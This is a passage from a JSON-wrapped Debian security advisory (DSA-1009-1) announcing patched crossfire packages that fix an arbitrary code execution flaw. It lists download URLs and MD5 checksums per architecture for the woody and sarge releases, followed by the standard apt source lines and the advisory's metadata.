architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_hppa.deb\n Size/MD5 checksum: 175634 52f5ff61bc7c8eeab9aef678ccd023b0\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_hppa.deb\n Size/MD5 checksum: 2047990 ae204aed290fe71f37f2fd8693c1acb3\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_m68k.deb\n Size/MD5 checksum: 131890 3470c9b54fa4afe91af8d855260756f9\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_m68k.deb\n Size/MD5 checksum: 1925486 b0057f324e5faafec58416264d42e423\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_mips.deb\n Size/MD5 checksum: 170520 0853eab7b91be44f7340712aa4cdd671\n 
http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_mips.deb\n Size/MD5 checksum: 2035256 79844b4d370cafd330e94566a0d648ff\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_mipsel.deb\n Size/MD5 checksum: 169288 33b97adf5cac97c6c875bdd4b36e381c\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_mipsel.deb\n Size/MD5 checksum: 2035352 bc8cb7e86de9a7d8dd45a2304f7c5a16\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_powerpc.deb\n Size/MD5 checksum: 162678 bb01745d0447bf0ff0059e021582f573\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_powerpc.deb\n Size/MD5 checksum: 1998462 5984f0c34413a56816d251f667eb8742\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_s390.deb\n Size/MD5 checksum: 146146 363914f85b686bb91c6b70acbbe12b73\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_s390.deb\n Size/MD5 checksum: 1969362 fd2f926627e1007841d31cdeb74f82eb\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_sparc.deb\n Size/MD5 checksum: 156562 5a114c075a3a74b6a67309131417d505\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_sparc.deb\n Size/MD5 checksum: 1986776 ed5b96118b9ee6e037dbc931782ade23\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire_1.6.0.dfsg.1-4sarge2.dsc\n Size/MD5 checksum: 712 29da4111a63870ce67ed75a14a4c338c\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire_1.6.0.dfsg.1-4sarge2.diff.gz\n Size/MD5 checksum: 284676 5e40a45fac4a9b0cb828cdd20a8ec3d5\n 
http://security.debian.org/pool/updates/main/c/crossfire/crossfire_1.6.0.dfsg.1.orig.tar.gz\n Size/MD5 checksum: 4329330 67c8ee71b0539d369231764b19cc787e\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-doc_1.6.0.dfsg.1-4sarge2_all.deb\n Size/MD5 checksum: 888740 8d5bca10c51c61f905118dd1342bd5e0\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.6.0.dfsg.1-4sarge2_alpha.deb\n Size/MD5 checksum: 374720 f0d7b9d29175e6c782397abae95bda50\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.6.0.dfsg.1-4sarge2_alpha.deb\n Size/MD5 checksum: 2759264 2d103be9f1139ccef05292419a7f9fe6\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.6.0.dfsg.1-4sarge2_amd64.deb\n Size/MD5 checksum: 340982 d6a0d30f69c174e65798444b26a7ffbf\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.6.0.dfsg.1-4sarge2_amd64.deb\n Size/MD5 checksum: 2643944 76f0702338eabd86bacc5bf7770d7659\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.6.0.dfsg.1-4sarge2_arm.deb\n Size/MD5 checksum: 333522 71d3c49ff54106298d8e719d5c1f41ca\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.6.0.dfsg.1-4sarge2_arm.deb\n Size/MD5 checksum: 2639562 7a22211f4745afa931da217d160d3ba0\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.6.0.dfsg.1-4sarge2_i386.deb\n Size/MD5 checksum: 329094 8106898d7874492399f83ffbb2ac52f2\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.6.0.dfsg.1-4sarge2_i386.deb\n Size/MD5 checksum: 2625260 5e52ce516bf3ab4c100cc9f7ff51787d\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.6.0.dfsg.1-4sarge2_ia64.deb\n Size/MD5 checksum: 409472 
e1bd34614a0833aa566a73f48de8532f\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.6.0.dfsg.1-4sarge2_ia64.deb\n Size/MD5 checksum: 2854244 7f0ebd5971220d7beaaeedf2bf796f75\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.6.0.dfsg.1-4sarge2_hppa.deb\n Size/MD5 checksum: 351562 f050142a068a5ff3db8672826ba3a2cc\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.6.0.dfsg.1-4sarge2_hppa.deb\n Size/MD5 checksum: 2682006 68c5cf62151994d83e0c23fbc71711f0\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.6.0.dfsg.1-4sarge2_m68k.deb\n Size/MD5 checksum: 307692 2053682d4e1c6fc81f2a27c9bffa8229\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.6.0.dfsg.1-4sarge2_m68k.deb\n Size/MD5 checksum: 2570064 97af44855c45fdc51c39639654a344e0\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.6.0.dfsg.1-4sarge2_mips.deb\n Size/MD5 checksum: 348728 4186c9554fdfe3d7b9d90a6c7f5c1b8d\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.6.0.dfsg.1-4sarge2_mips.deb\n Size/MD5 checksum: 2657662 db60d5c20ede7be0ba33ca5b9ddfdd8e\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.6.0.dfsg.1-4sarge2_mipsel.deb\n Size/MD5 checksum: 347064 152226eb00bbe0650bf763e9b47af923\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.6.0.dfsg.1-4sarge2_mipsel.deb\n Size/MD5 checksum: 2656254 40764b19b22bc2e75f83146e6a0e72d9\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.6.0.dfsg.1-4sarge2_powerpc.deb\n Size/MD5 checksum: 342622 a58d7ae35a639e20d0a42826654c0fcf\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.6.0.dfsg.1-4sarge2_powerpc.deb\n Size/MD5 
checksum: 2651940 b9558856a293a97527919b784009bae9\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.6.0.dfsg.1-4sarge2_s390.deb\n Size/MD5 checksum: 336700 07dae1c1fb770e9474bdbbed7847def6\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.6.0.dfsg.1-4sarge2_s390.deb\n Size/MD5 checksum: 2642014 457a9bd118ff00e5bd257c8887cc40c8\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.6.0.dfsg.1-4sarge2_sparc.deb\n Size/MD5 checksum: 330976 6cfb55259f593ee029a1ed670fb1dfb8\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.6.0.dfsg.1-4sarge2_sparc.deb\n Size/MD5 checksum: 2626952 b4bddff33520b2ef2f8b16a08201ed6d\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 3, "modified": "2006-03-20T00:00:00", "published": "2006-03-20T00:00:00", "id": "DEBIAN:DSA-1009-1:1A76A", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00090.html", "title": "[SECURITY] [DSA 1009-1] New crossfire packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}